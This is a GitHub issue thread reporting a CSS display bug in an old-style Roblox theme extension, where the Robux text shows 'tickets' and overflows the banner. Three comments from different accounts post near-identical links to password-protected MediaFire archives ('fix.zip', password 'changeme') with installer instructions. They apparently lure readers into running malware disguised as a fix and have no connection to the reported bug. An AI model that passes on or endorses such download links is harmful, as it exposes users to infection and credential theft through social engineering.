### ISSUE TITLE
Banner robux text bug with tickets

### ISSUE THREAD

**Issue by drinkcept** [tersiswilvin/Roblox-2019-Old-Theme#92]
### Are you up-to-date?

- [X] I've confirmed that I am completely up-to-date.

### Is the problem in Experimental?

- [X] I've verified that the problem persists in the Experimental Branch.

### Browser

Firefox

### Page URL

https://www.roblox.com/home

### Channel

Release

### Type

CSS

### Describe the Problem

![image](https://github.com/user-attachments/assets/9bdd86e9-c2ff-45b9-82f1-9acc690810cb)
robux text also says tickets which is clipping outside the top banner

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
